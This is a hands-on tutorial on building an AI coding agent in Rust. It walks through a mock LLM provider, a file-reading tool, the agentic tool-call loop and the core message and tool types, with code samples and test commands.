Overview
Welcome to Building a Coding Agent in Rust -- a hands-on tutorial where you build your own AI coding agent from scratch in the mini-claw-code-starter template, guided by the architecture of Claude Code.
Looking for the original V1 hands-on tutorial? It's archived at archive/v1-book/en/ (Chinese translation at archive/v1-book/zh/).
What you'll build
By the end of this book, you'll have built a complete coding agent that:
- Connects to an LLM via an OpenAI-compatible HTTP provider
- Uses tools -- bash, file read/write/edit -- with a simple
Tooltrait - Loops autonomously -- the
SimpleAgentdrives the provider-tool cycle until done - Streams events through channels so a UI can show progress in real-time
- Tests deterministically with a
MockProviderthat returns canned responses - Enforces safety with a permission engine, safety checks, and hooks
- Loads project instructions from CLAUDE.md files and layered config
Architecture
The starter codebase uses a flat module layout:
mini-claw-code-starter/src/
types.rs -- Messages, tools, ToolSet, Provider trait, TokenUsage
agent.rs -- SimpleAgent (the core agent loop) and AgentEvent
mock.rs -- MockProvider for deterministic testing
streaming.rs -- SSE parsing, StreamAccumulator
instructions.rs -- InstructionLoader (CLAUDE.md discovery)
permissions.rs -- PermissionEngine
safety.rs -- SafetyChecker, SafeToolWrapper
hooks.rs -- Hook trait, HookRegistry
planning.rs -- PlanAgent (two-phase plan/execute)
config.rs -- Config, ConfigLoader, CostTracker
context.rs -- SystemPromptBuilder
providers/
openrouter.rs -- OpenRouterProvider (real HTTP backend)
tools/ -- Tool implementations (bash, file read/write/edit)
How to use this book
Start with Chapters 1-3. Three short, hands-on chapters get you from zero to a working agent in under an hour:
- Your First LLM Call — implement
MockProvider(test_mock_) - Your First Tool Call — implement
ReadTool(test_read_) - The Agentic Loop — implement
single_turnandSimpleAgent(test_single_turn_,test_simple_agent_)
Then continue with Chapters 4-18 for the full architecture: streaming, permissions, hooks, plan mode, configuration, and more.
The mini-claw-code-starter crate contains stub implementations with unimplemented!() markers and doc comments describing what to do. Read the chapter, fill in the stubs, then verify your work by running the tests.
Run tests to check your progress:
# Run tests for a specific chapter (use the correct test name from the table below)
cargo test -p mini-claw-code-starter test_mock_
# Run all tests
cargo test -p mini-claw-code-starter
Prerequisites
- Rust (edition 2024, 1.85+)
- Basic familiarity with async Rust (
async/await,tokio) - An OpenRouter API key (for the live provider chapters)
Chapter roadmap
Getting Started
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 1 | Your First LLM Call | src/mock.rs | test_mock_ |
| 2 | Your First Tool Call | src/tools/read.rs | test_read_ |
| 3 | The Agentic Loop | src/agent.rs | test_single_turn_, test_simple_agent_ |
Part I: Core Agent
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 4 | Messages & Types | src/types.rs (pre-filled) | test_mock_ |
| 5a | Provider & Streaming Foundations | src/mock.rs, src/streaming.rs | test_mock_, test_streaming_parse_, test_streaming_accumulator_ |
| 5b | OpenRouter & StreamingAgent | src/providers/openrouter.rs, src/streaming.rs | test_openrouter_, test_streaming_stream_chat_, test_streaming_streaming_agent_ |
| 6 | Tool Interface | src/tools/read.rs (already done in Ch2 — re-read) | test_read_ |
| 7 | The Agentic Loop (Deep Dive) | src/agent.rs (already done in Ch3 — re-read) | test_single_turn_, test_simple_agent_ |
Part II: Prompt & Tools
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 8 | System Prompt | src/instructions.rs | instructions |
| 9 | File Tools | src/tools/write.rs, src/tools/edit.rs (read.rs already done in Ch2) | test_read_, test_write_, test_edit_ |
| 10 | Bash Tool | src/tools/bash.rs | test_bash_ |
| 11 | Search Tools | (extension -- no stubs) | (no tests) |
| 12 | Tool Registry | src/types.rs (ToolSet — pre-filled, re-read) | test_multi_tool_ |
Part III: Safety & Control
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 13 | Permission Engine | src/permissions.rs | permissions |
| 14 | Safety Checks | src/safety.rs | safety |
| 15 | Hooks | src/hooks.rs | hooks |
| 16 | Plan Mode | src/planning.rs | plan |
Part IV: Configuration
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 17 | Settings Hierarchy | src/config.rs, src/usage.rs | config, cost_tracker |
| 18 | Project Instructions | src/instructions.rs, src/context.rs | instructions, context_manager |
Bonus (no chapter yet -- stubs + tests available)
| Topic | File to edit | Test command |
|---|---|---|
| AskTool (user input) | src/tools/ask.rs | ask (run with --ignored) |
| SubagentTool (child agents) | src/subagent.rs | subagent (run with --ignored) |
| Interactive CLI | examples/chat.rs | cargo run --example chat (after stub is filled in) |
Let's start building.
Chapter 1: Your First LLM Call
File(s) to edit:
src/mock.rsTest to run:cargo test -p mini-claw-code-starter test_mock_Estimated time: 15 min
Before building an agent, you need to talk to an LLM. In this chapter you will implement a MockProvider — a fake LLM that returns canned responses. No API key, no HTTP, no network. Just the protocol.
The nouns
Before any code, a one-line glossary of the types you'll meet in chapters 1–3. They're all already defined in src/types.rs — this list is just so the names aren't strangers. Chapter 4 is the deep dive; for now, a sentence each is enough:
| Type | What it is |
|---|---|
Message | Enum of conversation entries: System, User, Assistant, ToolResult, Attachment, Progress. |
AssistantTurn | What the LLM returns: optional text, a Vec<ToolCall>, a StopReason, optional TokenUsage. |
StopReason | Stop (the LLM is done) or ToolUse (it wants to call tools). |
ToolCall | LLM's request to call a tool: id, name, JSON arguments. |
ToolDefinition | JSON-Schema description of a tool, sent to the LLM so it knows what's available. |
Tool | Trait with definition() and call() — implement it to give the agent a new capability. |
ToolSet | A HashMap<String, Box<dyn Tool>> for dispatching tool calls by name. |
Provider | Trait with one chat() method — the abstraction over "an LLM that responds to messages." |
If any of these feel fuzzy later, come back here. Chapter 4 rebuilds all of them from scratch with full commentary.
Goal
Implement MockProvider so that:
- You create it with a
VecDeque<AssistantTurn>of canned responses. - Each call to
chat()returns the next response in sequence. - If all responses have been consumed, it returns an error.
The protocol
Every LLM interaction follows the same pattern:
sequenceDiagram
participant C as Your Code
participant L as LLM
C->>L: messages + tool definitions
L-->>C: text and/or tool calls + stop reason
You send messages and a list of available tools. The LLM responds with text, tool calls, or both — plus a StopReason telling you what to do next.
In Rust, that is one trait with one method:
#![allow(unused)] fn main() { pub trait Provider: Send + Sync { fn chat( &self, messages: &[Message], tools: &[&ToolDefinition], ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send; } }
The core types
Open mini-claw-code-starter/src/types.rs. These types are already defined for you — read them to understand the protocol:
classDiagram
class Provider {
<<trait>>
+chat(messages, tools) AssistantTurn
}
class AssistantTurn {
text: Option~String~
tool_calls: Vec~ToolCall~
stop_reason: StopReason
usage: Option~TokenUsage~
}
class StopReason {
<<enum>>
Stop
ToolUse
}
class Message {
<<enum>>
System(String)
User(String)
Assistant(AssistantTurn)
ToolResult
}
Provider --> AssistantTurn : returns
Provider --> Message : receives
AssistantTurn --> StopReason
AssistantTurn --> ToolCall : contains 0..*
The LLM responds with an AssistantTurn:
#![allow(unused)] fn main() { pub struct AssistantTurn { pub text: Option<String>, // what the LLM said pub tool_calls: Vec<ToolCall>, // tools it wants to call pub stop_reason: StopReason, // Stop or ToolUse pub usage: Option<TokenUsage>, // token counts (optional) } }
Two outcomes:
StopReason::Stop— the LLM is done, readtextfor the answerStopReason::ToolUse— the LLM wants to call tools, readtool_calls
That's it. Every coding agent — Claude Code, Cursor, Copilot — runs on this exact protocol.
Key Rust concept: Mutex for interior mutability
The Provider trait takes &self (not &mut self) because providers are shared across async tasks. But MockProvider needs to mutate its response queue. The solution is Mutex<VecDeque<AssistantTurn>> — it lets you mutate the queue through a shared reference.
#![allow(unused)] fn main() { pub struct MockProvider { responses: Mutex<VecDeque<AssistantTurn>>, } }
This pattern — Mutex around shared state in a &self method — appears throughout async Rust.
The implementation
Open src/mock.rs. You'll see the struct definition and two stubs.
Step 1: new()
Wrap the VecDeque in a Mutex:
#![allow(unused)] fn main() { pub fn new(responses: VecDeque<AssistantTurn>) -> Self { Self { responses: Mutex::new(responses), } } }
Step 2: chat()
Lock the mutex, pop the front response, convert None to an error:
#![allow(unused)] fn main() { async fn chat( &self, _messages: &[Message], _tools: &[&ToolDefinition], ) -> anyhow::Result<AssistantTurn> { self.responses .lock() .unwrap() .pop_front() .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses")) } }
Three lines of logic. The mock ignores messages and tools entirely — it just returns the next canned response.
Run the tests
cargo test -p mini-claw-code-starter test_mock_
14 tests verify your mock:
test_mock_returns_text— basic text responsetest_mock_returns_tool_calls— response with tool callstest_mock_steps_through_sequence— FIFO order across multiple callstest_mock_empty_responses_exhausted— error when queue is emptytest_mock_ignores_messages_and_tools— mock doesn't look at inputstest_mock_long_sequence— 10 responses consumed in order
What just happened
You implemented the Provider trait — the interface every LLM backend must satisfy. The MockProvider is your testing workhorse. Every test in this entire course uses it instead of calling a real API.
Later (Chapter 5b) you'll see OpenRouterProvider, which makes real HTTP calls. But the trait is the same. Swap the provider, and the rest of the code doesn't change.
Key takeaway
An LLM is a function: messages in → (text, tool_calls, stop_reason) out. Everything else is plumbing.
Check yourself
← Contents · Chapter 2: Your First Tool Call →
Chapter 2: Your First Tool Call
File(s) to edit:
src/tools/read.rsTest to run:cargo test -p mini-claw-code-starter test_read_Estimated time: 15 min
An LLM can't read files, run commands, or browse the web. It can only generate text. But it can ask your code to do those things. That's what tools are.
Goal
Implement ReadTool so that:
- It declares its name, description, and parameter schema.
- When called with
{"path": "some/file.txt"}, it reads the file and returns its contents. - Missing arguments or non-existent files produce errors.
How tool calling works
The LLM never touches the filesystem. It describes what it wants, and your code does it:
sequenceDiagram
participant A as Agent
participant L as LLM
participant T as ReadTool
A->>L: "What's in doc.txt?" + tool schemas
L-->>A: tool_call: read(path="doc.txt")
A->>T: call({"path": "doc.txt"})
T-->>A: "file contents here..."
A->>L: tool result: "file contents here..."
L-->>A: "The file contains..."
The LLM sees a JSON schema describing each tool. When it decides to use one, it outputs a structured request with the tool name and arguments. Your code parses this, runs the real function, and sends the result back.
The Tool trait
Open mini-claw-code-starter/src/types.rs and find the Tool trait:
#![allow(unused)] fn main() { #[async_trait::async_trait] pub trait Tool: Send + Sync { fn definition(&self) -> &ToolDefinition; async fn call(&self, args: Value) -> anyhow::Result<String>; } }
Two methods:
definition()returns the JSON schema that tells the LLM what this tool does and what arguments it takescall()executes the tool and returns a string result
Why #[async_trait] on Tool — and not on Provider?
You'll see this split throughout the book, so it's worth owning the one-liner now:
Tooluses#[async_trait]because we store tools heterogeneously inBox<dyn Tool>(aReadTooland aBashToolcoexist in oneHashMap).Box<dyn …>requires object safety, and a plainasync fnin a trait is not object-safe — it returns an anonymous future type the compiler can't erase. The#[async_trait]macro rewritesasync fn call(&self, …)intofn call(&self, …) -> Pin<Box<dyn Future + Send + '_>>, which is. One heap allocation per call, which is nothing next to the I/O the tool is about to do.Provideruses RPITIT (return-positionimpl Traitin traits, stable since Rust 1.75) because we only ever hold it as a generic parameter —SimpleAgent<P: Provider>— never asdyn Provider. Without object safety to preserve, we get the zero-cost version: no boxing, no allocation, the compiler monomorphizes a unique future type per impl.
The two-line mnemonic:
stored as Box<dyn T> → #[async_trait] (boxed future, object-safe)
used as a generic P: Trait → RPITIT (zero-cost, not object-safe)
That's the whole trade-off. Chapter 6 reprises it with the full Provider signature side-by-side once you've seen both traits in use.
The implementation
Open src/tools/read.rs. You'll see the struct and two stubs.
Step 1: The definition
A ToolDefinition describes the tool to the LLM using JSON Schema:
#![allow(unused)] fn main() { pub fn new() -> Self { Self { definition: ToolDefinition::new("read", "Read the contents of a file.") .param("path", "string", "Absolute path to the file", true), } } }
The .param() builder adds a parameter with its type, description, and whether it's required. When the LLM sees this schema, it knows it can call a tool named "read" with a required string argument "path".
Step 2: The call
Extract the path from the JSON arguments, read the file, return the contents:
#![allow(unused)] fn main() { async fn call(&self, args: Value) -> anyhow::Result<String> { let path = args["path"] .as_str() .context("missing 'path' argument")?; tokio::fs::read_to_string(path) .await .with_context(|| format!("failed to read '{path}'")) } }
Three lines of logic. args is a serde_json::Value — the parsed JSON arguments from the LLM. The context() and with_context() methods (from anyhow) add human-readable error messages.
Here is the data flow:
flowchart LR
A["args: path = foo.txt"] --> B["as_str()"]
B --> C["tokio::fs::read_to_string"]
C --> D["Ok: file contents"]
C --> E["Err: failed to read"]
Run the tests
cargo test -p mini-claw-code-starter test_read_
15 tests verify your tool:
test_read_read_definition— schema has the right name and required paramstest_read_read_file— reads a real file from a temp directorytest_read_read_missing_file— returns an error for nonexistent filestest_read_read_missing_arg— returns an error whenpathis missingtest_read_read_utf8_content— handles multi-line content correctlytest_read_read_empty_file— reads an empty file without error
The pattern
Every tool in this project follows the same three-step pattern:
- Define —
ToolDefinition::new("name", "description").param(...) - Extract — pull arguments from the JSON
Value - Execute — do the thing, return a
String
You'll repeat this for WriteTool, EditTool, and BashTool in later chapters. Once you've written one tool, you've written them all.
Key takeaway
A tool is the bridge between "the LLM wants to read a file" and "the file is actually read." The LLM describes its intent as structured JSON. Your code does the work.
Check yourself
← Chapter 1: Your First LLM Call · Contents · Chapter 3: The Agentic Loop →
Chapter 3: The Agentic Loop
File(s) to edit:
src/agent.rsTests to run:cargo test -p mini-claw-code-starter test_single_turn_(single_turn),cargo test -p mini-claw-code-starter test_simple_agent_(SimpleAgent) Estimated time: 20 min
You have a provider (talks to the LLM) and a tool (reads files). Now you connect them. This is where the agent comes alive.
Goal
Implement two things:
single_turn()— handle one prompt with at most one round of tool callsSimpleAgent— wrapsingle_turnin a loop that keeps going until the LLM is done
What's in scope for Ch3 (and what isn't)
When you open src/agent.rs you'll see five unimplemented!() stubs. Only four of them are Chapter 3's job:
| Stub | Chapter | Notes |
|---|---|---|
single_turn | Ch3 | one prompt, at most one tool round |
SimpleAgent::execute_tools | Ch3 | look up each tool, collect (id, content) pairs |
SimpleAgent::push_results | Ch3 | push Assistant turn, then one ToolResult each |
SimpleAgent::chat | Ch3 | the main agent loop |
SimpleAgent::run_with_history | Ch7 | events-based loop; leave stubbed for now |
The run_with_history / run_with_events pair is for Chapter 7 (AgentEvent-driven execution). No Ch3 test calls them, so the unimplemented!() there will not panic during test_simple_agent_. Ignore them until Chapter 7 introduces the events model.
The core idea
Every coding agent — Claude Code, Cursor, Aider — is this loop:
loop {
response = provider.chat(messages, tools)
if response.stop_reason == Stop:
return response.text
for call in response.tool_calls:
result = tools.execute(call)
messages.append(result)
}
The LLM decides when to stop. Your code just follows instructions.
flowchart TD
A["User prompt"] --> B["provider.chat()"]
B --> C{"stop_reason?"}
C -- "Stop" --> D["Return text"]
C -- "ToolUse" --> E["Execute tool calls"]
E --> F["Append results to messages"]
F --> B
Part 1: single_turn()
Start simple. single_turn() handles one prompt with at most one round of tool calls — no looping yet.
Key Rust concept: ToolSet
The function takes a &ToolSet — a HashMap<String, Box<dyn Tool>> that indexes tools by name for O(1) lookup:
#![allow(unused)] fn main() { pub async fn single_turn<P: Provider>( provider: &P, tools: &ToolSet, prompt: &str, ) -> anyhow::Result<String> }
The flow
flowchart TD
A["prompt"] --> B["provider.chat()"]
B --> C{"stop_reason?"}
C -- "Stop" --> D["Return text"]
C -- "ToolUse" --> E["Execute each tool call"]
E --> F{"Tool found?"}
F -- "Yes" --> G["tool.call() → result"]
F -- "No" --> H["error: unknown tool"]
G --> I["Push Assistant + ToolResult messages"]
H --> I
I --> J["provider.chat() again"]
J --> K["Return final text"]
Implementation
#![allow(unused)] fn main() { pub async fn single_turn<P: Provider>( provider: &P, tools: &ToolSet, prompt: &str, ) -> anyhow::Result<String> { let defs = tools.definitions(); let mut messages = vec![Message::User(prompt.to_string())]; let turn = provider.chat(&messages, &defs).await?; match turn.stop_reason { StopReason::Stop => Ok(turn.text.unwrap_or_default()), StopReason::ToolUse => { // Execute each tool call, collect results let mut results = Vec::new(); for call in &turn.tool_calls { let content = match tools.get(&call.name) { Some(t) => t.call(call.arguments.clone()) .await .unwrap_or_else(|e| format!("error: {e}")), None => format!("error: unknown tool `{}`", call.name), }; results.push((call.id.clone(), content)); } // Feed results back to the LLM messages.push(Message::Assistant(turn)); for (id, content) in results { messages.push(Message::ToolResult { id, content }); } let final_turn = provider.chat(&messages, &defs).await?; Ok(final_turn.text.unwrap_or_default()) } } } }
Three key details:
- Collect results before pushing
Message::Assistant(turn)— the push movesturn, so you can't borrowturn.tool_callsafter that - Never crash on tool failure — catch errors with
unwrap_or_elseand return them as strings. The LLM reads the error and adapts - Unknown tools get an error string — not a panic. The LLM might hallucinate a tool name; your agent handles it gracefully
Test it
cargo test -p mini-claw-code-starter test_single_turn_
14 tests including:
test_single_turn_direct_response— LLM responds immediately, no toolstest_single_turn_one_tool_call— LLM reads a file, then answerstest_single_turn_unknown_tool— LLM calls a nonexistent tool, gets an error, recoverstest_single_turn_provider_error— provider returns an error, propagated correctly
Part 2: SimpleAgent
single_turn handles one round. A real agent loops until the LLM is done. That's SimpleAgent.
The struct
#![allow(unused)] fn main() { pub struct SimpleAgent<P: Provider> { provider: P, tools: ToolSet, } }
Constructor and builder
#![allow(unused)] fn main() { pub fn new(provider: P) -> Self { Self { provider, tools: ToolSet::new() } } pub fn tool(mut self, t: impl Tool + 'static) -> Self { self.tools.push(t); self } }
The builder pattern lets you chain tool registration:
#![allow(unused)] fn main() { let agent = SimpleAgent::new(provider) .tool(ReadTool::new()) .tool(WriteTool::new()) .tool(BashTool::new()); }
The loop: chat()
Aside: who decides Stop vs ToolUse?
The model does. StopReason is not a value we compute from the response; it is
a field the LLM API returns describing what the model did. When the model
emitted plain text and stopped, the API reports stop (or end_turn). When
the model emitted one or more tool-call blocks and paused expecting the
caller to run them, the API reports tool_use (OpenAI calls it
tool_calls). Our StopReason enum is just a thin translation of that API
field into a Rust type; the decision is baked into the model's generation.
Practically, the model decides in a single forward pass: once it begins
writing a tool-call block, most providers force the response to terminate on
that block and return tool_use to the caller. It does not produce text
and then choose whether to call a tool as a separate step. This is why the
loop below looks so simple -- we never have to second-guess the stop reason,
we just dispatch on it.
This is single_turn generalized into a loop. Instead of calling the provider twice and returning, it keeps going until StopReason::Stop:
#![allow(unused)] fn main() { pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> { let defs = self.tools.definitions(); loop { let turn = self.provider.chat(messages, &defs).await?; match turn.stop_reason { StopReason::Stop => { let text = turn.text.clone().unwrap_or_default(); messages.push(Message::Assistant(turn)); return Ok(text); } StopReason::ToolUse => { let results = self.execute_tools(&turn.tool_calls).await; Self::push_results(messages, turn, results); } } } } }
Note: clone turn.text before pushing Message::Assistant(turn) — the push moves turn.
run() is a convenience wrapper:
#![allow(unused)] fn main() { pub async fn run(&self, prompt: &str) -> anyhow::Result<String> { let mut messages = vec![Message::User(prompt.to_string())]; self.chat(&mut messages).await } }
The helper methods execute_tools() and push_results() factor out the tool execution and message building — see the stubs in agent.rs for the signatures.
Test it
cargo test -p mini-claw-code-starter test_simple_agent_
16 tests including:
test_simple_agent_simple_text— single-turn text responsetest_simple_agent_multi_step— LLM reads a file, then writes a responsetest_simple_agent_three_turn_loop— read → edit → verify, three roundstest_simple_agent_error_recovery— tool fails, LLM reads the error and adapts
What just happened
You built a coding agent.
#![allow(unused)] fn main() { let agent = SimpleAgent::new(provider) .tool(ReadTool::new()) .tool(WriteTool::new()) .tool(BashTool::new()); let answer = agent.run("What files are in this directory?").await?; }
The agent sends the prompt to the LLM, the LLM calls bash("ls"), the agent executes it, feeds the output back, and the LLM summarizes the result. The loop handles any number of tool calls across any number of rounds.
That is the architecture. Everything else — streaming, permissions, plan mode, subagents — is built on top of this loop.
Check yourself
← Chapter 2: Your First Tool Call · Contents · Chapter 4: Messages & Types →
Chapter 4: Messages & Types
File(s) to edit: none —
src/types.rsis pre-filled in the starter. This chapter is a study-only deep dive into the type system you have already been using. Test to run:cargo test -p mini-claw-code-starter test_mock_still passes after this chapter (and did before) because the actual implementation work is insrc/mock.rs, which you filled in Chapter 1. The tests exercise the shapes defined intypes.rs, which is why we connect them here. Estimated time: 20 min (study only)
Goal
- Understand how the
Messageenum's four variants (System,User,Assistant,ToolResult) give every conversation participant a typed representation. - Understand the
ToolDefinitionbuilder pattern and why tools describe their JSON Schema parameters at construction time rather than hand-writing JSON. - Understand
ToolSetas the runtime registry that lets the agent dispatch tool calls by name. - Understand the
Providertrait's RPITIT signature and why it leaves room for any LLM backend to drop in without changing agent code.
Every coding agent is, at its core, a loop over a conversation. The user speaks, the model replies, tools produce results, and those results go back to the model. Before we can build that loop, we need a type system that represents every participant and every kind of payload in the conversation.
This chapter walks through the foundational types that the rest of the codebase depends on. Nothing here needs to be written by you -- src/types.rs is complete in the starter. Read for comprehension; the hands-on work resumes in Chapter 5a.
How the types connect
flowchart TD
U[Message::User] --> P[Provider::chat]
S[Message::System] --> P
P --> AT[AssistantTurn]
AT --> SR{StopReason}
SR -->|Stop| Text[Final text response]
SR -->|ToolUse| TC[ToolCall]
TC --> TS[ToolSet::get]
TS --> T[Tool::call]
T --> TR[Message::ToolResult]
TR --> P
Why a rich message type?
If you look at a raw LLM API (OpenAI, Anthropic), messages are JSON blobs with a role field: "system", "user", or "assistant". That is fine for a one-shot chatbot, but a coding agent needs more:
- Tool results that carry the ID of the tool call they answer, so the model can correlate request and response.
- System instructions that configure the model's behavior.
Claude Code models all of these as variants of a single Message enum. Our starter uses a simplified version with four variants.
File layout
All types live in a single file: src/types.rs. This includes the Message enum, AssistantTurn, ToolDefinition, ToolCall, Tool trait, ToolSet, Provider trait, TokenUsage, and StopReason.
1.1 The Message enum
Here is the full enum with its four variants:
#![allow(unused)] fn main() { pub enum Message { System(String), User(String), Assistant(AssistantTurn), ToolResult { id: String, content: String }, } }
The starter uses plain enum variants instead of wrapper structs. There are no message IDs, no serde tags, no constructors -- you construct variants directly:
#![allow(unused)] fn main() { let msg = Message::User("Hello".to_string()); let sys = Message::System("You are a helpful assistant".to_string()); let result = Message::ToolResult { id: call_id.clone(), content: "file contents here".to_string(), }; }
Let's walk through each variant.
System
#![allow(unused)] fn main() { Message::System(String) }
System messages carry instructions injected by the agent, not typed by the user. They configure the model's behavior (e.g., "You are a coding assistant").
User
#![allow(unused)] fn main() { Message::User(String) }
Straightforward -- the human's input. One message per turn.
Assistant
#![allow(unused)] fn main() { Message::Assistant(AssistantTurn) }
This is the richest variant. The model's response is wrapped in an AssistantTurn struct (described below). The model can return text, tool calls, or both.
ToolResult
#![allow(unused)] fn main() { Message::ToolResult { id: String, content: String } }
After the agent executes a tool, it packages the output into a ToolResult variant and appends it to the conversation. The id field links this result back to the specific ToolCall it answers -- without this, the model cannot correlate which result belongs to which call when multiple tools run in a single turn.
Note that in the starter, tool results are simple strings. There is no is_truncated flag or separate struct.
1.2 AssistantTurn
The assistant's response is captured in an AssistantTurn struct:
#![allow(unused)] fn main() { pub struct AssistantTurn { pub text: Option<String>, pub tool_calls: Vec<ToolCall>, pub stop_reason: StopReason, pub usage: Option<TokenUsage>, } }
The model can return text, tool calls, or both. text is Option<String> because when the model decides to use a tool, it may produce no human-readable text at all -- it just emits one or more ToolCall entries. The stop_reason tells the agent loop whether to execute tools and continue, or to present the response to the user and stop.
The usage field is Option<TokenUsage> because we attach token counts at parse time from the API response. Mock providers in tests may leave it as None.
1.3 StopReason
#![allow(unused)] fn main() { pub enum StopReason { /// The model finished — check `text` for the response. Stop, /// The model wants to use tools — check `tool_calls`. ToolUse, } }
This tiny enum drives the entire agent loop. When the provider parses the LLM response:
Stopmeans the model is done -- itstextfield contains the final answer for the user.ToolUsemeans the model wants to invoke tools -- the agent should look attool_calls, execute them, append the results, and call the provider again.
The agent loop uses match on stop_reason to decide whether to break or continue.
1.4 ToolCall
#![allow(unused)] fn main() { pub struct ToolCall { pub id: String, pub name: String, pub arguments: Value, } }
When the LLM responds with StopReason::ToolUse, it includes one or more ToolCall entries. Each has:
id-- a unique identifier assigned by the API (e.g.,"call_abc123"). This is whatToolResultMessage::tool_use_idreferences.name-- which tool to invoke (e.g.,"bash","read","edit").arguments-- a JSON object whose shape matches the tool's parameter schema.
The agent loop uses name to look up the tool in the ToolSet, passes arguments to tool.call(), and wraps the output in a Message::ToolResult whose id matches the ToolCall's id.
1.5 ToolDefinition and the builder pattern
Rust concept: the builder pattern
The ToolDefinition uses the builder pattern -- a common Rust idiom where
methods take self by value and return Self, enabling method chaining like
.param(...).param(...). Each call consumes the struct and returns a modified
version. This works because Rust's move semantics mean there is no overhead --
no cloning, no reference counting. The compiler optimizes the chain into a
series of in-place mutations. You will see this pattern throughout the codebase:
ToolSet::new().with(tool1).with(tool2), SimpleAgent::new(provider).tool(bash).
Every tool must describe itself to the LLM with a JSON Schema so the model knows what parameters are available. ToolDefinition holds this schema and provides a builder API for constructing it without hand-writing JSON:
#![allow(unused)] fn main() { pub struct ToolDefinition { pub name: &'static str, pub description: &'static str, pub parameters: Value, } }
The constructor initializes an empty object schema:
#![allow(unused)] fn main() { impl ToolDefinition { pub fn new(name: &'static str, description: &'static str) -> Self { Self { name, description, parameters: serde_json::json!({ "type": "object", "properties": {}, "required": [] }), } } } }
.param() -- add a simple parameter
#![allow(unused)] fn main() { pub fn param( mut self, name: &str, type_: &str, description: &str, required: bool, ) -> Self { self.parameters["properties"][name] = serde_json::json!({ "type": type_, "description": description }); if required { self.parameters["required"] .as_array_mut() .unwrap() .push(Value::String(name.to_string())); } self } }
This is the workhorse. Most tool parameters are simple types -- a "string" for a file path, a "number" for a line offset. The builder takes self by value and returns it, enabling chained calls:
#![allow(unused)] fn main() { ToolDefinition::new("read", "Read a file from disk") .param("path", "string", "Absolute path to the file", true) .param("offset", "number", "Line number to start reading from", false) .param("limit", "number", "Maximum number of lines to read", false) }
.param_raw() -- add a complex parameter
#![allow(unused)] fn main() { pub fn param_raw( mut self, name: &str, schema: Value, required: bool, ) -> Self { self.parameters["properties"][name] = schema; if required { self.parameters["required"] .as_array_mut() .unwrap() .push(Value::String(name.to_string())); } self } }
Some parameters need richer schemas -- enums, arrays, nested objects. param_raw lets you pass an arbitrary serde_json::Value as the schema. For example, an edit tool might define:
#![allow(unused)] fn main() { .param_raw("changes", serde_json::json!({ "type": "array", "items": { "type": "object", "properties": { "old_string": { "type": "string" }, "new_string": { "type": "string" } } } }), true) }
Implement ToolDefinition in src/types.rs. There are no dedicated
unit tests for the builder itself in the starter -- its correctness is
exercised indirectly by every tool's _definition test (for example
test_read_read_definition in tests/read.rs). Making cargo build -p mini-claw-code-starter
succeed is the practical check here.
1.6 The Tool trait
This is the central abstraction. Every tool -- Bash, Read, Write, Edit -- implements this trait:
#![allow(unused)] fn main() { #[async_trait::async_trait] pub trait Tool: Send + Sync { fn definition(&self) -> &ToolDefinition; async fn call(&self, args: Value) -> anyhow::Result<String>; } }
Just two required methods -- this is deliberately minimal:
definition() returns the tool's schema. This is called once when registering tools and whenever the agent needs to send tool definitions to the LLM. It returns a reference (&ToolDefinition) because the definition is static for the lifetime of the tool.
call() is the execution entry point. It receives the JSON arguments the LLM provided and returns a String result (or an error). This is async because most tools do I/O -- reading files, running subprocesses, making HTTP requests.
Note that call() returns anyhow::Result<String> -- not a ToolResult struct. The starter simplifies tool output to plain strings. If a tool fails, you can return Ok(format!("error: {e}")) to let the model see the error and recover, or return Err(e) for unrecoverable situations.
The trait uses #[async_trait] and is marked Send + Sync so tools can be stored as Box<dyn Tool> in the ToolSet and called from async contexts. For why Tool uses #[async_trait] while Provider uses RPITIT, see Why two async trait styles?.
1.7 ToolSet
The agent needs to look up tools by name when the LLM requests a tool call. ToolSet is a HashMap-backed registry:
#![allow(unused)] fn main() { pub struct ToolSet { tools: HashMap<String, Box<dyn Tool>>, } }
The key methods:
#![allow(unused)] fn main() { impl ToolSet { pub fn new() -> Self { Self { tools: HashMap::new() } } /// Builder-style: add a tool and return self. pub fn with(mut self, tool: impl Tool + 'static) -> Self { self.push(tool); self } /// Add a tool, keyed by its definition name. pub fn push(&mut self, tool: impl Tool + 'static) { let name = tool.definition().name.to_string(); self.tools.insert(name, Box::new(tool)); } /// Look up a tool by name. pub fn get(&self, name: &str) -> Option<&dyn Tool> { self.tools.get(name).map(|t| t.as_ref()) } /// Collect all tool schemas for the provider. pub fn definitions(&self) -> Vec<&ToolDefinition> { self.tools.values().map(|t| t.definition()).collect() } } impl Default for ToolSet { fn default() -> Self { Self::new() } } }
A few design points:
with()enables builder-style chaining:ToolSet::new().with(ReadTool::new()).with(BashTool::new()).push()extracts the name from the tool's definition, so you never pass the name manually -- one source of truth.definitions()collects all schemas into aVecthat the provider sends to the LLM at the start of each turn.Box<dyn Tool>is the trait object that makes heterogeneous storage possible. The'staticbound onpush/withensures the tool lives long enough.
ToolSet has no dedicated test of its own in the starter -- it is exercised
by the test_single_turn_* suite (Chapter 3) and test_multi_tool_* suite
(Chapter 12), both of which construct real ToolSets and assert their
definitions are rendered correctly.
1.8 TokenUsage
LLM APIs report token counts with each response. Tracking these is useful for cost awareness and debugging.
#![allow(unused)] fn main() { #[derive(Debug, Clone, Default)] pub struct TokenUsage { pub input_tokens: u64, pub output_tokens: u64, } }
The starter uses a simplified TokenUsage with just input and output token counts. It is stored as Option<TokenUsage> in AssistantTurn -- mock providers in tests set it to None, while the real OpenRouterProvider populates it from the API response.
The Default impl is covered by test_cost_tracker_token_usage_default in
tests/cost_tracker.rs (used again in Chapter 17). If you want to run it in
isolation:
cargo test -p mini-claw-code-starter test_cost_tracker_token_usage_default
1.9 The Provider trait
The Provider trait
The Provider trait is defined in src/types.rs. It abstracts over any LLM backend:
#![allow(unused)] fn main() { pub trait Provider: Send + Sync { fn chat<'a>( &'a self, messages: &'a [Message], tools: &'a [&'a ToolDefinition], ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a; } }
Unlike Tool, Provider uses RPITIT (return-position impl Trait in traits) rather than #[async_trait]. The full trade-off is covered in Why two async trait styles?.
